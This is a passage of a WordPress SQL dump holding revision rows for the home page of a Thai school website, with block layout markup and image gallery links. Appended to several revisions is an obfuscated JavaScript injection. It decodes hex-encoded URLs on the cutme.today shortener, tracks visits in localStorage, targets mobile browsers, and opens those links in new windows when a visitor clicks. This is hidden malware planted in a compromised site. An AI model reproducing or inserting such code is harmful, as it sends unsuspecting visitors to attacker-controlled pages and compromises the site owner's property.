_0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-07-27 10:01:06','2024-07-27 03:01:06','',14,'http://pakhaeng.ssk.in.th/?p=26',0,'revision','',0),
(28,1,'2024-07-27 10:23:18','2024-07-27 03:23:18','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /--></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-07-27 10:23:18','2024-07-27 03:23:18','',14,'http://pakhaeng.ssk.in.th/?p=28',0,'revision','',0),
(30,1,'2024-07-27 10:31:40','2024-07-27 03:31:40','','ผอ 1','','inherit','','closed','','%e0%b8%9c%e0%b8%ad-1','','','2024-07-27 10:31:40','2024-07-27 03:31:40','',14,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png',0,'attachment','image/png',0),
(31,1,'2024-07-27 10:31:43','2024-07-27 03:31:43','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"20px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":20,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} /-->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let 